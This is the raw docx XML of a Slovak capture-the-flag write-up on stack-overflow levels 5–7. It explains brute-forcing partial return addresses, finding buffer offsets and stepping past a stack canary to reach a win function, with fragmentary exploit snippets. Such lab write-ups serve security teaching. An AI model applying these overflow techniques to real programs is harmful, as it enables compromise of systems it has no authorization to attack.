                      <a:off x="0" y="0"/>
                      <a:ext cx="2730414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9D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244359" w:rsidRPr="00244359">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42CD732F" wp14:editId="6EF4A2EB">
            <wp:extent cx="2716268" cy="936000"/>
            <wp:effectExtent l="0" t="0" r="825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9"/>
                    <a:srcRect t="54467" r="2637"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2716268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66459" w14:textId="5CF0D5F9" w:rsidR="00850469" w:rsidRDefault="00850469" w:rsidP="008A1D6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850469">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Stačilo teda </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">v cykle </w:t>
      </w:r>
      <w:r w:rsidRPr="00850469">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">skúšať všetky možnosti pre </w:t>
      </w:r>
      <w:r w:rsidR="009149D7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>posledné 2 bajty adresy</w:t>
      </w:r>
      <w:r w:rsidR="008A1D6F">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> až kým sme nedostali flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C004B8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6181AC4E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ntex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error'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BC25A5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229CC1E" w14:textId="3FE10F04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color w:val="6666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[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0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1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2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3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578BAB46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4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5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6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7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14:paraId="09470B34" w14:textId="1A0EDDF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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'\x50\x8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9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A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B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19D52580" w14:textId="6A3039EF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C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D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E2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'\x50\xF2'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</w:p>
    <w:p w14:paraId="210C60EA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2EEBA6F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te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4B7334D3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ces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/memory_level_5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DBE7046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200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DE5FD4E" w14:textId="61D8B936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168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add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 w:rsidR="009149D7" w:rsidRPr="009149D7"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 w:rsidR="009149D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># offset 168 + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009149D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>posledne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009149D7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 bajty adresy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3364F0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2DB42F98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74929CFA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bispp_flag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379D1CF4" w14:textId="77777777" w:rsidR="00F278D8" w:rsidRDefault="00F278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0BDE07F" w14:textId="74F1D137" w:rsidR="00DE7C82" w:rsidRPr="009149D7" w:rsidRDefault="00F278D8" w:rsidP="009149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593801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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6AF1C" w14:textId="48AC327F" w:rsidR="009149D7" w:rsidRDefault="009149D7" w:rsidP="00F278D8">
      <w:r w:rsidRPr="00DE7C82">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="111A053C" wp14:editId="2E479322">
            <wp:extent cx="5387807" cy="1386960"/>
            <wp:effectExtent l="0" t="0" r="381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C2E0" w14:textId="0390B008" w:rsidR="00AE11E6" w:rsidRPr="004464F8" w:rsidRDefault="000C3308" w:rsidP="00AE11E6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="004464F8">
        <w:t>Level 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220CF133" w14:textId="3C9BC073" w:rsidR="00F10F9D" w:rsidRPr="00AE0134" w:rsidRDefault="00E15F11" w:rsidP="00361ED5">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00F10F9D" w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ol</w:t>
      </w:r>
      <w:r w:rsidR="009149D7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tu</w:t>
      </w:r>
      <w:r w:rsidR="00F10F9D" w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> zapnutý stack canary aj PIE flag, čiže sme nemohli tak ľahko prepísať stack a ani priamo vyčítať adresy z Binary Ninja.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBD5634" w14:textId="2116D4F4" w:rsidR="00F10F9D" w:rsidRPr="00AE0134" w:rsidRDefault="00F10F9D" w:rsidP="00E75AF9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48074B28" wp14:editId="0AD3A980">
            <wp:extent cx="3530600" cy="1115844"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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3928" cy="11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5F73" w14:textId="63EA1651" w:rsidR="00AE0134" w:rsidRPr="00AE0134" w:rsidRDefault="00F10F9D" w:rsidP="002022F8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Avšak tu netreba volať fun</w:t>
      </w:r>
      <w:r w:rsidR="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ciu win, pretože sa flag číta priamo vo vuln, </w:t>
      </w:r>
      <w:r w:rsidR="00E75AF9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>preto</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> nám stačí nájsť </w:t>
      </w:r>
      <w:r w:rsidR="002022F8">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">iba </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>správny offset</w:t>
      </w:r>
      <w:r w:rsidR="002022F8">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> na to</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, aby sme </w:t>
      </w:r>
      <w:r w:rsidR="002022F8">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vypísali flag</w:t>
      </w:r>
      <w:r w:rsidR="00AE0134" w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2192FA40" w14:textId="66F384B4" w:rsidR="00AE0134" w:rsidRDefault="00AE0134" w:rsidP="00AE01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istenie offsetu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB1248" w14:textId="0320D3CC" w:rsidR="00AE0134" w:rsidRPr="00E15F11" w:rsidRDefault="00AE0134" w:rsidP="00E15F11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E15F11">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Offset sme hľadali tak, že sme v cykle skúšali rôzne veľké vstupy až kým jeden z nich nevypísal flag. </w:t>
      </w:r>
      <w:r w:rsidR="00E15F11" w:rsidRPr="00E15F11">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Správny offset bol </w:t>
      </w:r>
      <w:r w:rsidR="00E15F11" w:rsidRPr="00E15F11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="00E15F11" w:rsidRPr="00E15F11">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149A6497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0211C1F6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bookmarkStart w:id="0" w:name="_Hlk69305453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ntex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error'</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="7E4AAA51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ffset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g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00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1174EF39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ces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/memory_level_6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E0A299C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100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6EB1F95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35279622" w14:textId="1AE1B19F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offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># A, AA, AAA, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB76BB2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79AB613B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3EBDFEE8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Offset: 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offset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19E8E878" w14:textId="0F0022D4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bispp_flag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 xml:space="preserve">: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nasli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sme flag =&gt; koniec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172B036F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82F89DF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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C913F8" w14:textId="77777777" w:rsidR="00AE0134" w:rsidRDefault="00AE0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01986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25E0A84" w14:textId="77777777" w:rsidR="00AE0134" w:rsidRDefault="00AE0134" w:rsidP="00AE11E6"/>
    <w:p w14:paraId="095579AC" w14:textId="201A7F63" w:rsidR="00F10F9D" w:rsidRDefault="00F10F9D" w:rsidP="00AE11E6">
      <w:r w:rsidRPr="00F10F9D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3395AA1E" wp14:editId="070D7984">
            <wp:extent cx="5731510" cy="37890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5483" w14:textId="38BAC8B1" w:rsidR="00CC2942" w:rsidRDefault="000C3308" w:rsidP="00AE11E6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="004464F8">
        <w:t>Level 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FADC230" w14:textId="6B3E4537" w:rsidR="0000329A" w:rsidRDefault="0000329A" w:rsidP="00361ED5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Zistenie offsetu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7F3770" w14:textId="33E16F71" w:rsidR="00F10769" w:rsidRPr="004E4057" w:rsidRDefault="00F10769" w:rsidP="00561E9B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Offset sme hľadali tak isto, ako pri leveli 6, teda prechádzali sme rôzne veľké offsety a sledovali sme výstup.</w:t>
      </w:r>
      <w:r w:rsidR="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pri offsete 64 sa za </w:t>
      </w:r>
      <w:r w:rsidR="004E4057" w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pa</w:t>
      </w:r>
      <w:r w:rsidR="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="004E4057" w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> začali pridávať </w:t>
      </w:r>
      <w:r w:rsidR="001A364C" w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bajty,</w:t>
      </w:r>
      <w:r w:rsidR="004E4057" w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> čo znamená,</w:t>
      </w:r>
      <w:r w:rsidR="001A364C" w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> že veľkosť buffera je 64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F53B77" w14:textId="53A355EA" w:rsidR="001A364C" w:rsidRDefault="00D73AC2" w:rsidP="00561E9B">
      <w:r w:rsidRPr="00D73AC2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C23C46E" wp14:editId="4FFEC054">
            <wp:extent cx="5731510" cy="5842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60C" w14:textId="7A986EF6" w:rsidR="0073020D" w:rsidRPr="00CD5BE2" w:rsidRDefault="00D73AC2" w:rsidP="004E4057">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ďalej sme potrebovali zistiť vzdialenosť kanárika od konca </w:t>
      </w:r>
      <w:r w:rsidR="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buffera</w:t>
      </w:r>
      <w:r w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0073020D" w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pri vstupe veľkosti 64 bajtov zostáva medzi kanárikom a bufferom </w:t>
      </w:r>
      <w:r w:rsidR="00B46E8C" w:rsidRPr="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(0x7ffe5eb85b80</w:t>
      </w:r>
      <w:r w:rsidR="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46E8C" w:rsidRPr="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46E8C" w:rsidRPr="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x40)</w:t>
      </w:r>
      <w:r w:rsidR="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46E8C" w:rsidRPr="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46E8C" w:rsidRPr="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x7ffe5eb85bc8</w:t>
      </w:r>
      <w:r w:rsidR="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46E8C" w:rsidRPr="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A3B01" w:rsidRPr="001E0CD9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x8</w:t>
      </w:r>
      <w:r w:rsidR="001A3B01" w:rsidRPr="001E0CD9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A3B01" w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">teda 8 bajtov. Dokopy teda potrebujeme vyplniť </w:t>
      </w:r>
      <w:r w:rsidR="001A3B01" w:rsidRPr="00F83038">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>64+8</w:t>
      </w:r>
      <w:r w:rsidR="004E4057" w:rsidRPr="00F83038">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">+1 </w:t>
      </w:r>
      <w:r w:rsidR="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bajt</w:t>
      </w:r>
      <w:r w:rsidR="00F3059C">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ov</w:t>
      </w:r>
      <w:r w:rsidR="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004E4057" w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">aby sme </w:t>
      </w:r>
      <w:r w:rsidR="00F3059C">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vyplnili buffer, priestor medzi bufferom a kanárikom</w:t>
      </w:r>
      <w:r w:rsidR="004E4057" w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">aj </w:t>
      </w:r>
      <w:r w:rsidR="004E4057" w:rsidRPr="004E4057">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>posledný NULL bajt kanárika.</w:t>
      </w:r>
      <w:r w:rsidR="002C6738">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Za kanárikom bude treba vyplniť ďalších 8 bajtov </w:t>
      </w:r>
      <w:r w:rsidR="00AF3768">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">a potom prepísať </w:t>
      </w:r>
      <w:r w:rsidR="00144D38">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>posledné 2 bajty návratovej a adresy na win funkciu (inštrukci</w:t>
      </w:r>
      <w:r w:rsidR="00CD5BE2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00144D38">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> za </w:t>
      </w:r>
      <w:r w:rsidR="00B837E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>„if“</w:t>
      </w:r>
      <w:r w:rsidR="00144D38">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B837E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441673F4" w14:textId="16B86382" w:rsidR="0073020D" w:rsidRDefault="00AF3768" w:rsidP="00561E9B"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E275A" wp14:editId="151388F0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4157345</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1182370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1246909" cy="29146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BACDA" w14:textId="746F55C8" w:rsidR="00AF3768" w:rsidRPr="004C1622" w:rsidRDefault="00B837E2" w:rsidP="00AF3768">
                            <w:pPr>
                              <w:spacing w:after="0"/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Návratová</w:t>
                            </w:r>
                            <w:r w:rsidR="00AF3768"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 xml:space="preserve">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275A" id="Rectangle 43" o:spid="_x0000_s1033" style="position:absolute;margin-left:327.35pt;margin-top:93.1pt;width:98.2pt;height:2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" filled="f" stroked="f" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="05BBACDA" w14:textId="746F55C8" w:rsidR="00AF3768" w:rsidRPr="004C1622" w:rsidRDefault="00B837E2" w:rsidP="00AF3768">
                      <w:pPr>
                        <w:spacing w:after="0"/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Návratová</w:t>
                      </w:r>
                      <w:r w:rsidR="00AF3768"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 xml:space="preserve"> adresa</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r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7C174A" wp14:editId="599A669B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1195388</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1121410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3019425" cy="166688"/>
                <wp:effectExtent l="19050" t="19050" r="28575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66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E580" id="Rectangle 42" o:spid="_x0000_s1026" style="position:absolute;margin-left:94.15pt;margin-top:88.3pt;width:237.75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" filled="f" strokecolor="#00b050" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r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F3494" wp14:editId="52AFF0B5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3711575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>763905</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1246909" cy="29146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1AE47" w14:textId="0E491C14" w:rsidR="004E4057" w:rsidRPr="004C1622" w:rsidRDefault="004E4057" w:rsidP="004E4057">
                            <w:pPr>
                              <w:spacing w:after="0"/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Kaná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3494" id="Rectangle 40" o:spid="_x0000_s1034" style="position:absolute;margin-left:292.25pt;margin-top:60.15pt;width:98.2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" filled="f" stroked="f" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2B41AE47" w14:textId="0E491C14" w:rsidR="004E4057" w:rsidRPr="004C1622" w:rsidRDefault="004E4057" w:rsidP="004E4057">
                      <w:pPr>
                        <w:spacing w:after="0"/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Kanárik</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r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6A70C" wp14:editId="2443894E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4642802</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>380365</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1246909" cy="29146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0243" w14:textId="049EA514" w:rsidR="004E4057" w:rsidRPr="004C1622" w:rsidRDefault="00AF3768" w:rsidP="004E4057">
                            <w:pPr>
                              <w:spacing w:after="0"/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B050">
                                    <w14:alpha w14:val="60000"/>
                                  </w14:srgbClr>
                                </w14:shadow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A70C" id="Rectangle 39" o:spid="_x0000_s1035" style="position:absolute;margin-left:365.55pt;margin-top:29.95pt;width:98.2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" filled="f" stroked="f" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2B430243" w14:textId="049EA514" w:rsidR="004E4057" w:rsidRPr="004C1622" w:rsidRDefault="00AF3768" w:rsidP="004E4057">
